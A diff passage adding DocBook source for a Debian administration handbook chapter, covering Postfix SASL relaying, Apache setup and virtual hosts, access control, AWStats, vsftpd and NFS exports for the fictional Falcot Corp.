+	the client that authenticates with SASL. Here are the required
+	parameters:</para>
+
+        <programlisting>
+smtp_sasl_auth_enable = yes
+smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
+relay_host = [mail.falcot.com]
+</programlisting>
+
+	<para>The <filename>/etc/postfix/sasl_passwd</filename> file needs
+	to contain the username and password to use for authenticating on
+	the <literal>mail.falcot.com</literal> server. Here is an
+	example:</para>
+
+        <programlisting>
+[mail.falcot.com]   joe:LyinIsji
+</programlisting>
+
+	<para>As for all Postfix maps, this file must be turned into
+	<filename>/etc/postfix/sasl_passwd.db</filename> with the
+	<command>postmap</command> command.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.http-web-server">
+    <title>Web Server (HTTP)</title>
+
+    <para>The Falcot Corp administrators decided to use the Apache HTTP
+    server, included in Debian <emphasis role="distribution">Jessie</emphasis> at version 2.4.10.</para>
+    <indexterm><primary><command>apache</command></primary></indexterm>
+    <indexterm><primary>server</primary><secondary>web</secondary></indexterm>
+    <indexterm><primary>web server</primary></indexterm>
+    <indexterm><primary>server</primary><secondary>HTTP</secondary></indexterm>
+    <indexterm><primary>HTTP</primary><secondary>server</secondary></indexterm>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Other web servers</title>
+
+      <para>Apache is merely the most widely-known (and widely-used) web
+      server, but there are others; they can offer better performance under
+      certain workloads, but this has its counterpart in the smaller number
+      of available features and modules. However, when the prospective web
+      server is built to serve static files or to act as a proxy, the
+      alternatives, such as <emphasis role="pkg">nginx</emphasis> and
+      <emphasis role="pkg">lighttpd</emphasis>, are worth
+      investigating.</para>
+      <indexterm><primary><emphasis role="pkg">nginx</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">lighttpd</emphasis></primary></indexterm>
+    </sidebar>
+    <section>
+      <title>Installing Apache</title>
+
+      <para>
+        Installing the <emphasis role="pkg">apache2</emphasis> package
+        is all that is needed. It contains all the modules, including
+        the <emphasis>Multi-Processing Modules</emphasis> (MPMs) that
+        affect how Apache handles parallel processing of many requests
+        (those used to be provided in separate <emphasis role="pkg">apache2-mpm-*</emphasis> packages). It will also pull
+        <emphasis role="pkg">apache2-utils</emphasis> containing the
+        command line utilities that we will discover later.
+      </para>
+
+      <para>
+        The MPM in use affects significantly the way Apache will handle
+        concurrent requests. With the <emphasis>worker</emphasis> MPM, it
+        uses <emphasis>threads</emphasis> (lightweight processes), whereas
+        with the <emphasis>prefork</emphasis> MPM it uses a pool of
+        processes created in advance. With the <emphasis>event</emphasis> MPM
+        it also uses threads, but the inactive connections (notably those
+        kept open by the HTTP <emphasis>keep-alive</emphasis> feature) are
+        handed back to a dedicated management thread.
+      </para>
+
+      <para>
+        The Falcot administrators also install <emphasis role="pkg">libapache2-mod-php5</emphasis> so as to include the
+        PHP support in Apache. This causes the
+        default <emphasis>event</emphasis> MPM to be disabled, and
+        <emphasis>prefork</emphasis> to be used instead, since PHP
+        only works under that particular MPM.
+      </para>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> Execution under the <literal>www-data</literal> user</title>
+        <indexterm><primary><literal>www-data</literal></primary></indexterm>
+        <indexterm><primary>suexec</primary></indexterm>
+
+	<para>By default, Apache handles incoming requests under the
+	identity of the <literal>www-data</literal> user. This means that a
+	security vulnerability in a CGI script executed by Apache (for a
+	dynamic page) won't compromise the whole system, but only the files
+	owned by this particular user.</para>
+
+	<para>Using the <emphasis>suexec</emphasis> modules allows
+	bypassing this rule so that some CGI scripts are executed under the
+	identity of another user. This is configured with a
+	<literal>SuexecUserGroup
+	<replaceable>user</replaceable><replaceable>group</replaceable></literal>
+	directive in the Apache configuration.</para>
+        <indexterm><primary><emphasis role="pkg">libapache2-mpm-itk</emphasis></primary></indexterm>
+
+	<para>Another possibility is to use a dedicated MPM, such as
+	the one provided by <emphasis role="pkg">libapache2-mpm-itk</emphasis>.  This particular one
+	has a slightly different behavior: it allows “isolating”
+	virtual hosts (actually, sets of pages) so that they each run
+	as a different user. A vulnerability in one website therefore
+	cannot compromise files belonging to the owner of another
+	website.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> List of modules</title>
+
+	<para>The full list of Apache standard modules can be found online.
+	<ulink type="block" url="http://httpd.apache.org/docs/2.4/mod/index.html" /></para>
+      </sidebar>
+
+      <para>Apache is a modular server, and many features are implemented
+      by external modules that the main program loads during its
+      initialization. The default configuration only enables the most
+      common modules, but enabling new modules is a simple matter of
+      running <command>a2enmod <replaceable>module</replaceable></command>;
+      to disable a module, the command is <command>a2dismod
+      <replaceable>module</replaceable></command>. These programs actually
+      only create (or delete) symbolic links in
+      <filename>/etc/apache2/mods-enabled/</filename>, pointing at the
+      actual files (stored in
+      <filename>/etc/apache2/mods-available/</filename>).</para>
+
+      <para>With its default configuration, the web server listens on port
+      80 (as configured in <filename>/etc/apache2/ports.conf</filename>),
+      and serves pages from the <filename>/var/www/html/</filename> directory
+      (as configured in
+      <filename>/etc/apache2/sites-enabled/000-default.conf</filename>).</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Adding support for SSL</title>
+        <indexterm><primary>HTTPS</primary></indexterm>
+        <indexterm><primary>HTTP</primary><secondary>secure</secondary></indexterm>
+
+	<para>Apache 2.4 includes the SSL module required for secure HTTP
+	(HTTPS) out of the box. It just needs to be enabled with
+	<command>a2enmod ssl</command>, then the required directives have
+	to be added to the configuration files. A configuration example is
+	provided in
+	<filename>/etc/apache2/sites-available/default-ssl.conf</filename>.
+	<ulink type="block" url="http://httpd.apache.org/docs/2.4/mod/mod_ssl.html" /></para>
+
+	<para>Some extra care must be taken if you want to favor
+	SSL connections with <emphasis>Perfect Forward Secrecy</emphasis>
+	(those connections use ephemeral session keys ensuring that
+	a compromission of the server's secret key does not result
+	in the compromission of old encrypted traffic that could have
+	been stored while sniffing on the network). Have a look at
+	Mozilla's recommandations in particular:
+	<ulink type="block" url="https://wiki.mozilla.org/Security/Server_Side_TLS#Apache" />
+	</para>
+	<indexterm><primary><emphasis>Perfect Forward Secrecy</emphasis></primary></indexterm>
+      </sidebar>
+    </section>
+    <section>
+      <title>Configuring Virtual Hosts</title>
+
+      <para>A virtual host is an extra identity for the web server.</para>
+      <indexterm><primary>virtual host</primary></indexterm>
+
+      <para>Apache considers two different kinds of virtual hosts: those
+      that are based on the IP address (or the port), and those that rely
+      on the domain name of the web server. The first method requires
+      allocating a different IP address (or port) for each site, whereas
+      the second one can work on a single IP address (and port), and the
+      sites are differentiated by the hostname sent by the HTTP client
+      (which only works in version 1.1 of the HTTP protocol — fortunately
+      that version is old enough that all clients use it already).</para>
+
+      <para>The (increasing) scarcity of IPv4 addresses usually favors the
+      second method; however, it is made more complex if the virtual hosts
+      need to provide HTTPS too, since the SSL protocol hasn't always
+      provided for name-based virtual hosting; the SNI extension
+      (<emphasis>Server Name Indication</emphasis>) that allows such a
+      combination is not handled by all browsers. When several HTTPS sites
+      need to run on the same server, they will usually be differentiated
+      either by running on a different port or on a different IP address
+      (IPv6 can help there).</para>
+
+      <para>The default configuration for Apache 2 enables name-based
+      virtual hosts.  In addition, a default virtual host is defined
+      in the <literal>/etc/apache2/sites-enabled/000-default.conf</literal>
+      file; this virtual host will be used if no host matching the
+      request sent by the client is found.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> First virtual host</title>
+
+	<para>Requests concerning unknown virtual hosts will always be
+	served by the first defined virtual host, which is why we defined
+	<literal>www.falcot.com</literal> first here.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> Apache supports SNI</title>
+        <indexterm><primary>Server Name Indication</primary></indexterm>
+
+	<para>The Apache server supports
+	an SSL protocol extension called <emphasis>Server Name
+	Indication</emphasis> (SNI). This extension allows the browser to
+	send the hostname of the web server during the establishment of the
+	SSL connection, much earlier than the HTTP request itself, which
+	was previously used to identify the requested virtual host among
+	those hosted on the same server (with the same IP address and
+	port). This allows Apache to select the most appropriate SSL
+	certificate for the transaction to proceed.</para>
+
+	<para>Before SNI, Apache would always use the certificate defined
+	in the default virtual host. Clients trying to access another
+	virtual host would then display warnings, since the certificate
+	they received didn't match the website they were trying to access.
+	Fortunately, most browsers now work with SNI; this includes
+	Microsoft Internet Explorer starting with version 7.0 (starting on
+	Vista), Mozilla Firefox starting with version 2.0, Apple Safari
+	since version 3.2.1, and all versions of Google Chrome.</para>
+
+	<para>The Apache package provided in Debian is built with support
+	for SNI; no particular configuration is therefore needed.</para>
+
+	<para>Care should also be taken to ensure that the configuration
+	for the first virtual host (the one used by default) does enable
+	TLSv1, since Apache uses the parameters of this first virtual host
+	to establish secure connections, and they had better allow
+	them!</para>
+      </sidebar>
+
+      <para>Each extra virtual host is then described by a file stored in
+      <filename>/etc/apache2/sites-available/</filename>. Setting up a
+      website for the <literal>falcot.org</literal> domain is therefore a
+      simple matter of creating the following file, then enabling the
+      virtual host with <command>a2ensite www.falcot.org</command>.</para>
+
+      <example>
+        <title>The <filename>/etc/apache2/sites-available/www.falcot.org.conf</filename> file</title>
+
+        <programlisting>
+&lt;VirtualHost *:80&gt;
+ServerName www.falcot.org
+ServerAlias falcot.org
+DocumentRoot /srv/www/www.falcot.org
+&lt;/VirtualHost&gt;
+</programlisting>
+      </example>
+
+      <para>The Apache server, as configured so far, uses the same log
+      files for all virtual hosts (although this could be changed by adding
+      <literal>CustomLog</literal> directives in the definitions of the
+      virtual hosts). It therefore makes good sense to customize the format
+      of this log file to have it include the name of the virtual host.
+      This can be done by creating a
+      <filename>/etc/apache2/conf-available/customlog.conf</filename> file that defines
+      a new format for all log files (with the <literal>LogFormat</literal>
+      directive) and by enabling it with <command>a2enconf customlog</command>.
+      The <literal>CustomLog</literal> line must also be
+      removed (or commented out) from the
+      <filename>/etc/apache2/sites-available/000-default.conf</filename>
+      file.</para>
+
+      <example>
+        <title>The <filename>/etc/apache2/conf.d/customlog.conf</filename> file</title>
+
+        <programlisting role="scale">
+# New log format including (virtual) host name
+LogFormat "%v %h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" vhost
+
+# Now let's use this "vhost" format by default
+CustomLog /var/log/apache2/access.log vhost
+</programlisting>
+      </example>
+    </section>
+    <section>
+      <title>Common Directives</title>
+
+      <para>This section briefly reviews some of the commonly-used Apache
+      configuration directives.</para>
+      <indexterm><primary>Apache directives</primary></indexterm>
+      <indexterm><primary>directives, Apache</primary></indexterm>
+
+      <para>The main configuration file usually includes several
+      <literal>Directory</literal> blocks; they allow specifying different
+      behaviors for the server depending on the location of the file being
+      served. Such a block commonly includes <literal>Options</literal> and
+      <literal>AllowOverride</literal> directives.
+      </para>
+      <indexterm><primary><literal>Options</literal>, Apache directive</primary></indexterm>
+      <indexterm><primary><literal>AllowOverride</literal>, Apache directive</primary></indexterm>
+
+      <example>
+        <title>Directory block</title>
+
+        <programlisting>
+&lt;Directory /var/www&gt;
+Options Includes FollowSymlinks
+AllowOverride All
+DirectoryIndex index.php index.html index.htm
+&lt;/Directory&gt;
+</programlisting>
+      </example>
+
+      <para>The <literal>DirectoryIndex</literal> directive contains a list
+      of files to try when the client request matches a directory. The
+      first existing file in the list is used and sent as a response.
+      </para>
+      <indexterm><primary><literal>DirectoryIndex</literal>, Apache directive</primary></indexterm>
+
+      <para>The <literal>Options</literal>
+      directive is followed by a list of options to enable. The
+      <literal>None</literal> value disables all options; correspondingly,
+      <literal>All</literal> enables them all except
+      <literal>MultiViews</literal>. Available options include:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>ExecCGI</literal> indicates that CGI scripts can
+	  be executed. <indexterm><primary><literal>ExecCGI</literal>,
+	  Apache directive</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>FollowSymlinks</literal> tells the server that
+	  symbolic links can be followed, and that the response should
+	  contain the contents of the target of such links.
+	  <indexterm><primary><literal>FollowSymlinks</literal>, Apache
+	  directive</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>SymlinksIfOwnerMatch</literal> also tells the
+	  server to follow symbolic links, but only when the link and the
+	  its target have the same owner.
+	  <indexterm><primary><literal>SymlinksIfOwnerMatch</literal>,
+	  Apache directive</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>Includes</literal> enables <emphasis>Server Side
+	  Includes</emphasis> (<emphasis>SSI</emphasis> for short). These
+	  are directives embedded in HTML pages and executed on the fly for
+	  each request. <indexterm><primary><literal>Includes</literal>,
+	  Apache directive</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>Indexes</literal> tells the server to list the
+	  contents of a directory if the HTTP request sent by the client
+	  points at a directory without an index file (ie, when no files
+	  mentioned by the <literal>DirectoryIndex</literal> directive
+	  exists in this directory).
+	  <indexterm><primary><literal>Indexes</literal>, Apache
+	  directive</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>MultiViews</literal> enables content negotiation;
+	  this can be used by the server to return a web page matching the
+	  preferred language as configured in the browser.
+	  <indexterm><primary><literal>MultiViews</literal>, Apache
+	  directive</primary></indexterm></para>
+        </listitem>
+      </itemizedlist>
+
+      <para></para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> <filename>.htaccess</filename> file</title>
+
+	<para>The <filename>.htaccess</filename> file contains Apache
+	configuration directives enforced each time a request concerns an
+	element of the directory where it is stored. The scope of these
+	directives also recurses to all the subdirectories within.</para>
+        <indexterm><primary><filename>.htaccess</filename></primary></indexterm>
+
+	<para>Most of the directives that can occur in a
+	<literal>Directory</literal> block are also legal in a
+	<filename>.htaccess</filename> file.</para>
+      </sidebar>
+
+      <para>The <literal>AllowOverride</literal> directive lists all the
+      options that can be enabled or disabled by way of a
+      <filename>.htaccess</filename> file. A common use of this option is
+      to restrict <literal>ExecCGI</literal>, so that the administrator
+      chooses which users are allowed to run programs under the web
+      server's identity (the <literal>www-data</literal> user).</para>
+      <indexterm><primary><literal>AllowOverride</literal>, Apache directive</primary></indexterm>
+      <section>
+        <title>Requiring Authentication</title>
+        <indexterm><primary>web authentication</primary></indexterm>
+
+	<para>In some circumstances, access to part of a website needs to
+	be restricted, so only legitimate users who provide a username and
+	a password are granted access to the contents.</para>
+
+        <example>
+          <title><filename>.htaccess</filename> file requiring authentication</title>
+
+          <programlisting>
+Require valid-user
+AuthName "Private directory"
+AuthType Basic
+AuthUserFile /etc/apache2/authfiles/htpasswd-private
+</programlisting>
+        </example>
+
+        <sidebar>
+          <title><emphasis>SECURITY</emphasis> No security</title>
+
+	  <para>The authentication system used in the above example
+	  (<literal>Basic</literal>) has minimal security as the password
+	  is sent in clear text (it is only encoded as
+	  <emphasis>base64</emphasis>, which is a simple encoding rather
+	  than an encryption method). It should also be noted that the
+	  documents “protected” by this mechanism also go over the
+	  network in the clear. If security is important, the whole HTTP
+	  connection should be encrypted with SSL.</para>
+        </sidebar>
+
+	<para>The
+	<filename>/etc/apache2/authfiles/htpasswd-private</filename> file
+	contains a list of users and passwords; it is commonly manipulated
+	with the <command>htpasswd</command> command. For example, the
+	following command is used to add a user or change their password:
+	<indexterm><primary><command>htpasswd</command></primary></indexterm></para>
+
+        <screen>
+<computeroutput># </computeroutput><userinput>htpasswd /etc/apache2/authfiles/htpasswd-private <replaceable>user</replaceable>
+</userinput><computeroutput>New password:
+Re-type new password:
+Adding password for user <replaceable>user</replaceable>
+</computeroutput></screen>
+      </section>
+      <section>
+        <title>Restricting Access</title>
+        <indexterm><primary>web access restriction</primary></indexterm>
+
+	<para>The <literal>Require</literal> directive controls access
+	restrictions for a directory (and its subdirectories,
+	recursively).</para>
+
+	<indexterm><primary>Apache directives</primary></indexterm>
+	<indexterm><primary>directives, Apache</primary></indexterm>
+	<indexterm><primary><literal>Require</literal>, Apache directive</primary></indexterm>
+
+	<para>It can be used to restrict access based on many
+	criteria; we will stop at describing access restriction based
+	on the IP address of the client, but it can be made much more
+	powerful than that, especially when several
+	<literal>Require</literal> directives are combined within a
+	<literal>RequireAll</literal> block.</para>
+
+        <example>
+          <title>Only allow from the local network</title>
+
+          <programlisting>Require ip 192.168.0.0/16
+</programlisting>
+        </example>
+
+      <sidebar>
+        <title><emphasis>ALTERNATIVE</emphasis> Old syntax</title>
+
+        <para>The <literal>Require</literal> syntax is only available
+        in Apache 2.4 (the version in <emphasis role="distribution">Jessie</emphasis>).  For users of
+        <emphasis role="distribution">Wheezy</emphasis>, the
+        Apache 2.2 syntax is different, and we describe it here mainly
+        for reference, although it can also be made available in
+        Apache 2.4 using the <literal>mod_access_compat</literal>
+        module.</para>
+
+	<para>The <literal>Allow from</literal> and <literal>Deny
+	from</literal> directives control access restrictions for a
+	directory (and its subdirectories, recursively).</para>
+
+	<indexterm><primary><literal>Allow from</literal>, Apache directive</primary></indexterm>
+	<indexterm><primary><literal>Deny from</literal>, Apache directive</primary></indexterm>
+	<indexterm><primary><literal>Order</literal>, Apache directive</primary></indexterm>
+
+	<para>The <literal>Order</literal> directive tells the server of
+	the order in which the <literal>Allow from</literal> and
+	<literal>Deny from</literal> directives are applied; the last one
+	that matches takes precedence. In concrete terms, <literal>Order
+	deny,allow</literal> allows access if no <literal>Deny
+	from</literal> applies, or if an <literal>Allow from</literal>
+	directive does. Conversely, <literal>Order allow,deny</literal>
+	rejects access if no <literal>Allow from</literal> directive
+	matches (or if a <literal>Deny from</literal> directive
+	applies).</para>
+
+	<para>The <literal>Allow from</literal> and <literal>Deny
+	from</literal> directives can be followed by an IP address, a
+	network (such as <literal>192.168.0.0/255.255.255.0</literal>,
+	<literal>192.168.0.0/24</literal> or even
+	<literal>192.168.0</literal>), a hostname or a domain name, or the
+	<literal>all</literal> keyword, designating everyone.</para>
+
+        <para>For instance, to reject connections by default but allow them
+        from the local network, you could use this:</para>
+        <programlisting>
+Order deny,allow
+Allow from 192.168.0.0/16
+Deny from all
+</programlisting>
+        </sidebar>
+      </section>
+    </section>
+    <section>
+      <title>Log Analyzers</title>
+
+      <para>A log analyzer is frequently installed on a web server; since
+      the former provides the administrators with a precise idea of the
+      usage patterns of the latter.</para>
+
+      <para>The Falcot Corp administrators selected
+      <emphasis>AWStats</emphasis> (<emphasis>Advanced Web
+      Statistics</emphasis>) to analyze their Apache log files.</para>
+      <indexterm><primary><emphasis>AWStats</emphasis></primary></indexterm>
+      <indexterm><primary>web logs analyzer</primary></indexterm>
+      <indexterm><primary>logs</primary><secondary>web logs analyzer</secondary></indexterm>
+      <indexterm><primary>analyzer of web logs</primary></indexterm>
+
+      <para>The first configuration step is the customization of the
+      <filename>/etc/awstats/awstats.conf</filename> file.
+      The Falcot administrators keep it unchanged apart from the following
+      parameters:</para>
+
+      <programlisting>
+LogFile="/var/log/apache2/access.log"
+LogFormat = "%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot"
+SiteDomain="www.falcot.com"
+HostAliases="falcot.com REGEX[^.*\.falcot\.com$]"
+DNSLookup=1
+LoadPlugin="tooltips"
+</programlisting>
+
+      <para>All these parameters are documented by comments in the template
+      file. In particular, the <varname>LogFile</varname> and
+      <varname>LogFormat</varname> parameters describe the location and
+      format of the log file and the information it contains;
+      <varname>SiteDomain</varname> and <varname>HostAliases</varname> list
+      the various names under which the main web site is known.</para>
+
+      <para>For high traffic sites, <varname>DNSLookup</varname> should
+      usually not be set to <literal>1</literal>; for smaller sites, such
+      as the Falcot one described above, this setting allows getting more
+      readable reports that include full machine names instead of raw IP
+      addresses.</para>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> Access to statistics</title>
+
+	<para>AWStats makes its statistics available on the website with no
+	restrictions by default, but restrictions can be set up so that
+	only a few (probably internal) IP addresses can access them; the
+	list of allowed IP addresses needs to be defined in the
+	<varname>AllowAccessFromWebToFollowingIPAddresses</varname>
+	parameter</para>
+      </sidebar>
+
+      <para>AWStats will also be enabled for other virtual hosts; each
+      virtual host needs its own configuration file, such as
+      <filename>/etc/awstats/awstats.www.falcot.org.conf</filename>.</para>
+
+      <example>
+        <title>AWStats configuration file for a virtual host</title>
+
+        <programlisting>
+Include "/etc/awstats/awstats.conf"
+SiteDomain="www.falcot.org"
+HostAliases="falcot.org"
+</programlisting>
+      </example>
+
+      <para>AWStats uses many icons stored in the
+      <filename>/usr/share/awstats/icon/</filename> directory. In order for
+      these icons to be available on the web site, the Apache configuration
+      needs to be adapted to include the following directive:</para>
+
+      <programlisting>
+Alias /awstats-icon/ /usr/share/awstats/icon/
+</programlisting>
+
+      <para>After a few minutes (and once the script has been run a few
+      times), the results are available online: <ulink type="block" url="http://www.falcot.com/cgi-bin/awstats.pl" /><ulink type="block" url="http://www.falcot.org/cgi-bin/awstats.pl" /></para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Log file rotation</title>
+
+	<para>In order for the statistics to take all the logs into
+	account, <emphasis>AWStats</emphasis> needs to be run right before
+	the Apache log files are rotated. Looking at the <literal>prerotate</literal>
+        directive of <filename>/etc/logrotate.d/apache2</filename> file,
+	this can be solved by putting a symlink to
+	<filename>/usr/share/awstats/tools/update.sh</filename> in
+	<filename>/etc/logrotate.d/httpd-prerotate</filename>:</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>cat /etc/logrotate.d/apache2
+</userinput><computeroutput>/var/log/apache2/*.log {
+  daily
+  missingok
+  rotate 14
+  compress
+  delaycompress
+  notifempty
+  create 644 root adm
+  sharedscripts
+  postrotate
+    if /etc/init.d/apache2 status &gt; /dev/null ; then \
+      /etc/init.d/apache2 reload &gt; /dev/null; \
+    fi;
+  endscript
+  prerotate
+    if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
+      run-parts /etc/logrotate.d/httpd-prerotate; \
+    fi; \
+  endscript
+}
+$ </computeroutput><userinput>sudo mkdir -p /etc/logrotate.d/httpd-prerotate
+</userinput><computeroutput>$ </computeroutput><userinput>sudo ln -sf /usr/share/awstats/tools/update.sh \
+  /etc/logrotate.d/httpd-prerotate/awstats
+</userinput></screen>
+
+	<para>Note also that the log files created by
+	<command>logrotate</command> need to be readable by everyone,
+	especially AWStats. In the above example, this is ensured by the
+	<literal>create 644 root adm</literal> line (instead of the default
+	<literal>640</literal> permissions).</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.ftp-file-server">
+    <title>FTP File Server</title>
+    <indexterm><primary>FTP (<emphasis>File Transfer Protocol</emphasis>)</primary></indexterm>
+
+    <para>FTP (<emphasis>File Transfer Protocol</emphasis>) is one of the
+    first protocols of the Internet (RFC 959 was issued in 1985!). It was
+    used to distribute files before the Web was even born (the HTTP
+    protocol was created in 1990, and formally defined in its 1.0 version
+    by RFC 1945, issued in 1996).</para>
+
+    <para>This protocol allows both file uploads and file downloads; for
+    this reason, it is still widely used to deploy updates to a website
+    hosted by one's Internet service provider (or any other entity hosting
+    websites). In these cases, secure access is enforced with a user
+    identifier and password; on successful authentication, the FTP server
+    grants read-write access to that user's home directory.</para>
+
+    <para>Other FTP servers are mainly used to distribute files for public
+    downloading; Debian packages are a good example. The contents of these
+    servers is fetched from other, geographically remote, servers; it is
+    then made available to less distant users. This means that client
+    authentication is not required; as a consequence, this operating mode
+    is known as “anonymous FTP”. To be perfectly correct, the clients
+    do authenticate with the <literal>anonymous</literal> username; the
+    password is often, by convention, the user's email address, but the
+    server ignores it.</para>
+
+    <para>Many FTP servers are available in Debian (<emphasis role="pkg">ftpd</emphasis>, <emphasis role="pkg">proftpd-basic</emphasis>,
+    <emphasis role="pkg">pyftpd</emphasis> and so on). The Falcot Corp
+    administrators picked <emphasis role="pkg">vsftpd</emphasis> because
+    they only use the FTP server to distribute a few files (including a
+    Debian package repository); since they don't need advanced features,
+    they chose to focus on the security aspects.</para>
+    <indexterm><primary><emphasis role="pkg">vsftpd</emphasis></primary></indexterm>
+
+    <para>Installing the package creates an <literal>ftp</literal> system
+    user. This account is always used for anonymous FTP connections, and
+    its home directory (<filename>/srv/ftp/</filename>) is the root of the
+    tree made available to users connecting to this service. The default
+    configuration (in <filename>/etc/vsftpd.conf</filename>) requires some
+    changes to cater to the simple need of making big files available
+    for public downloads: anonymous access needs to be enabled
+    (<literal>anonymous_enable=YES</literal>) and read-only access of
+    local users needs to be disabled (<literal>local_enable=NO</literal>).
+    The latter is particularly important since the FTP protocol doesn't
+    use any form of encryption and the user password could be intercepted
+    over the wire.
+    </para>
+  </section>
+  <section id="sect.nfs-file-server">
+    <title>NFS File Server</title>
+
+    <para>NFS (<emphasis>Network File System</emphasis>) is a protocol
+    allowing remote access to a filesystem through the network. All Unix
+    systems can work with this protocol; when Windows systems are involved,
+    Samba must be used instead.</para>
+    <indexterm><primary>NFS</primary></indexterm>
+    <indexterm><primary><emphasis>Network</emphasis></primary><secondary><emphasis>File System</emphasis></secondary></indexterm>
+    <indexterm><primary>filesystem</primary><secondary>network</secondary></indexterm>
+    <indexterm><primary>file</primary><secondary>server</secondary></indexterm>
+    <indexterm><primary>server</primary><secondary>file</secondary></indexterm>
+
+    <para>NFS is a very useful tool but, historically, it has suffered from
+    many limitations, most of which have been addressed with version 4 of
+    the protocol. The downside is that the latest version of NFS is
+    harder to configure when you want to make use of basic security
+    features such as authentication and encryption since it relies on
+    Kerberos for those parts. And without those, the NFS protocol must
+    be restricted to a trusted local network since data goes over the
+    network unencrypted (a <emphasis>sniffer</emphasis> can intercept it) and
+    access rights are granted based on the client's IP address (which can be
+    spoofed).</para>
+
+    <sidebar>
+      <title><emphasis>DOCUMENTATION</emphasis> NFS HOWTO</title>
+
+      <para>Good documentation to deploy NFSv4 is rather scarce. Here
+        are some pointers with content of varying quality but that
+        should at least give some hints on what should be done.
+        <ulink type="block" url="https://help.ubuntu.com/community/NFSv4Howto" /> 
+        <ulink type="block" url="http://wiki.linux-nfs.org/wiki/index.php/Nfsv4_configuration" /> 
+      </para>
+    </sidebar>
+    <section>
+      <title>Securing NFS</title>
+      <indexterm><primary>NFS</primary><secondary>security</secondary></indexterm>
+
+      <para>If you don't use the Kerberos-based security features, 
+      it is vital to ensure that only the machines allowed to use NFS can
+      connect to the various required RPC servers, because the basic
+      protocol trusts the data received from the network. The firewall
+      must also block <emphasis>IP spoofing</emphasis> so as to prevent an
+      outside machine from acting as an inside one, and access to the
+      appropriate ports must be restricted to the machines meant to access
+      the NFS shares.</para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> RPC</title>
+
+	<para>RPC (<emphasis>Remote Procedure Call</emphasis>) is a Unix
+	standard for remote services. NFS is one such service.</para>
+        <indexterm><primary>RPC</primary></indexterm>
+        <indexterm><primary><emphasis>Remote Procedure Call</emphasis></primary></indexterm>
+
+	<para>RPC services register to a directory known as the
+	<emphasis>portmapper</emphasis>. A client wishing to perform an NFS
+	query first addresses the <emphasis>portmapper</emphasis> (on port
+	111, either TCP or UDP), and asks for the NFS server; the reply
+	usually mentions port 2049 (the default for NFS). Not all RPC
+	services necessarily use a fixed port.</para>
+      </sidebar>
+
+      <para>Older versions of the protocol required other RPC services which
+      used dynamically assigned ports. Fortunately, with NFS version 4,
+      only port 2049 (for NFS) and 111 (for the portmapper) are needed and
+      they are thus easy to firewall.
+      </para>
+      <indexterm><primary><command>portmapper</command></primary></indexterm>
+
+    </section>
+    <section>
+      <title>NFS Server</title>
+
+      <para>The NFS server is part of the Linux kernel; in kernels provided
+      by Debian it is built as a kernel module. If the NFS server is to be
+      run automatically on boot, the <emphasis role="pkg">nfs-kernel-server</emphasis> package should be installed;
+      it contains the relevant start-up scripts.</para>
+
+      <para>The NFS server configuration file,
+      <filename>/etc/exports</filename>, lists the directories that are
+      made available over the network (<emphasis>exported</emphasis>). For
+      each NFS share, only the given list of machines is granted access.
+      More fine-grained access control can be obtained with a few options.
+      The syntax for this file is quite simple:</para>
+      <indexterm><primary><filename>exports</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/exports</filename></primary></indexterm>
+
+      <programlisting>
+/directory/to/share machine1(option1,option2,...) machine2(...) ...
+</programlisting>
+
+      <para>Note that with NFSv4, all exported directories must be part of
+        a single hierarchy and that the root directory of that hierarchy
+        must be exported and identified with the option <literal>fsid=0</literal>
+        or <literal>fsid=root</literal>.
+      </para>
+
+      <para>Each machine can be identified either by its DNS name or its IP
+      address. Whole sets of machines can also be specified using either a
+      syntax such as <literal>*.falcot.com</literal> or an IP address range
+      such as <literal>192.168.0.0/255.255.255.0</literal> or
+      <literal>192.168.0.0/24</literal>.</para>
+
+      <para>Directories are made available as read-only by default (or with
+      the <literal>ro</literal> option). The <literal>rw</literal> option
+      allows read-write access. NFS clients typically connect from a port
+      restricted to root (in other words, below 1024); this restriction can
+      be lifted by the <literal>insecure</literal> option (the
+      <literal>secure</literal> option is implicit, but it can be made
+      explicit if needed for clarity).</para>
+      <indexterm><primary>NFS</primary><secondary>options</secondary></indexterm>
+
+      <para>By default, the server only answers an NFS query when the
+      current disk operation is complete (<literal>sync</literal> option);
+      this can be disabled with the <literal>async</literal> option.
+      Asynchronous writes increase performance a bit, but they decrease
+      reliability since there is a data loss risk in case of the server
+      crashing between the acknowledgment of the write and the actual
+      write on disk. Since the default value changed recently (as compared
+      to the historical value of NFS), an explicit setting is
+      recommended.</para>
+
+      <para>In order to not give root access to the filesystem to any NFS
+      client, all queries appearing to come from a root user are considered
+      by the server as coming from the <literal>nobody</literal> user.
+      This behavior corresponds to the <literal>root_squash</literal>
+      option, and is enabled by default. The
+      <literal>no_root_squash</literal> option, which disables this
+      behavior, is risky and should only be used in controlled
+      environments. The
+      <literal>anonuid=<replaceable>uid</replaceable></literal> and
+      <literal>anongid=<replaceable>gid</replaceable></literal> options
+      allow specifying another fake user to be used instead of
+      UID/GID 65534 (which corresponds to user <literal>nobody</literal> and group
